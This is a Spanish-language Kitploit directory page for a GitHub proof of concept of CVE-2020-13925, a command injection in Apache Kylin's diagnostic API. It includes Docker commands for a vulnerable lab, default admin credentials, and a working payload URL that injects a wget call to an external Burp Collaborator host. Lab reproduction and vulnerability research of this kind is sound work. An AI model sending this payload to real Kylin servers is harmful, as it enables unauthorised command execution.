Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-13925 — PoC y guía de reproducción para CVE-2020-13925, una vulnerabilidad de inyección de comandos en la API de diagnóstico de Apache Kylin, con configuración de laboratorio basada en Docker y pasos de explotación. | Kitploit
Herramientas/GitHubGitHub/bit4woo/cve-2020-13925
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubbit4woo/cve-2020-13925

CVE-2020-13925

PoC y guía de reproducción para CVE-2020-13925, una vulnerabilidad de inyección de comandos en la API de diagnóstico de Apache Kylin, con configuración de laboratorio basada en Docker y pasos de explotación.

Ver Repositorio
161hace 6 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-13925

Configuración del entorno

Consulte https://github.com/apache/kylin para implementar el entorno con Docker, modificando la versión a la 3.0.1 (la versión vulnerable). Puede eliminar 【-m 8G \】que sirve para asignar el tamaño de la memoria.

Luego acceda a http://host:7070/kylin/login. El nombre de usuario y contraseña iniciales son ADMIN/KYLIN.

root@kitploit:~
docker pull apachekylin/apache-kylin-standalone:3.0.1

docker run -d \
    -m 8G \
    -p 7070:7070 \
    -p 8088:8088 \
    -p 50070:50070 \
    -p 8032:8032 \
    -p 8042:8042 \
    -p 16010:16010 \
    apachekylin/apache-kylin-standalone:3.0.1
    
docker run -d \
    -p 7070:7070 \
    -p 8088:8088 \
    -p 50070:50070 \
    -p 8032:8032 \
    -p 8042:8042 \
    -p 16010:16010 \
    apachekylin/apache-kylin-standalone:3.0.1

PoC de verificación de vulnerabilidad

root@kitploit:~
原始请求:
http://host:port/kylin/api/diag/project/learn_kylin/download
        
PoC请求,GET方法:
http://host:port/kylin/api/diag/project/%7c%7cwget%20h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net%7c%7c/download

即将项目名称“learn_kylin”替换为如下payload访问即可:
||wget h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net||

Pasos de reproducción

Acceda a System → Configuration → Diagnosis. Active la solicitud de descarga de información de diagnóstico http://host:port/kylin/api/diag/project/learn_kylin/download image.png

Reemplace el nombre del proyecto "learn_kylin" con el payload anterior y acceda.

image.png

Enlaces de referencia

https://mp.weixin.qq.com/s/LdEgENX2_b8tb12n4H9KJQ

Descargar herramienta